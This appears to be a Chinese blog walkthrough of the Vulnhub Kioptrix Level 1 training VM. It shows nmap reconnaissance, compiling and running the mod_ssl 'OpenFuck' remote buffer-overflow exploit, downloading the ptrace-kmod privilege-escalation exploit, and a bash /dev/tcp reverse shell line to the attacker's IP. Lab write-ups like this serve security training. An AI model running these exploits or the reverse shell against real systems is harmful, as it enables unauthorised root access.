【Vulnhub靶场通关】Kioptix Level 1

靶场下载地址

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

一、信息收集

1. 扫存活主机

javascript 复制代码
nmap -sP 192.168.118.0/24 

本机IP 为192.168.118.128

分析得靶机IP为 192.168.118.129

2. 扫全端口

javascript 复制代码
nmap -p- 192.168.118.129 

3. 服务详情扫描

javascript 复制代码
nmap -sV -A 192.168.118.129

发现开放的443端口,其中Apache/1.3.20,版本过低,可查找mod_ssl 漏洞

二、漏洞发现

1. 查找 mod_ssl 漏洞

javascript 复制代码
searchsploit mod_ssl

2. 漏洞版本

https://www.exploit-db.com(漏洞库)中查找,使用最新漏洞利用:

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) unix/remote/47080.c

三、漏洞利用

1. 获取漏洞脚本

漏洞路径查询,当前路径查询,把脚本拷贝到当前桌面

bash 复制代码
locate unix/remote/47080.c

pwd

cp /usr/share/exploitdb/exploits/unix/remote/47080.c /root/Desktop

查看此脚本文件

发现需要安装相关依赖,编译,已给出相关利用指令

2. 使用脚本文件

安装依赖,编译

bash 复制代码
apt-get install libssl-dev

gcc -o 47080 47080.c -lcrypto

使用脚本文件

bash 复制代码
./文件名     显示文件使用说明

找到对应版本,尝试利用此脚本

bash 复制代码
./47080 0x6b 192.168.233.131 443 -c 40

此时发现已经得到 Shell ,输入 whami 尝试 ,发现只是普通用户

观察发现是 ptrace-kmod.c 文件获取失败

在给出的网址中下载 ptrace-kmod.c 到本地桌面,查看发现此文件为提权脚本文件

四、提权

1. kali 本机下载目标提权脚本

bash 复制代码
kali本机下载目标提权脚本:

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

2. 远程下载

在本地启动HTTP服务器,在目标中下载本地文件 ptrace-kmod.c并编译,然后重新利用漏洞,然后测试发现提权成功,获得root权限。

bash 复制代码
python -m http.server 80

wget 192.168.118.128/ptrace-kmod.c

3. Bash反弹Shell

bash 复制代码
nc -lvvp 6666

bash -i >& /dev/tcp/192.168.118.128/6666 0>&1
相关推荐
江南2606 小时前
CISAW安全集成,协助组织构建坚固的信息防护堡垒
安全·渗透测试·风险管理·cisaw·安全运维·应急服务
蚁景网络安全1 天前
Metasploit渗透测试之攻击终端设备和绕过安全软件
网络安全·渗透测试·metasploit
网络研究院2 天前
微软十月补丁星期二发现了 118 个漏洞
安全·microsoft·微软·系统·漏洞·补丁
ZapcoMan3 天前
封神台 SQL注入 靶场 (猫舍)手动注入
渗透测试·靶场·sql注入漏洞
弗锐土豆7 天前
对高危漏洞“Docker Engine API is accessible without authentication”的修复
docker·漏洞·1panel·2375·指定ip
网络研究院10 天前
Android 安卓内存安全漏洞数量大幅下降的原因
android·安全·编程·安卓·内存·漏洞·技术
小镇航海家11 天前
红日靶场1学习笔记
网络·笔记·学习·web安全·渗透测试
网络研究院12 天前
实施威胁暴露管理、降低网络风险暴露的最佳实践
网络·安全·漏洞·管理·风险·威胁·实践
你怎么睡得着的!12 天前
【web安全】——文件上传漏洞
web安全·漏洞·文件上传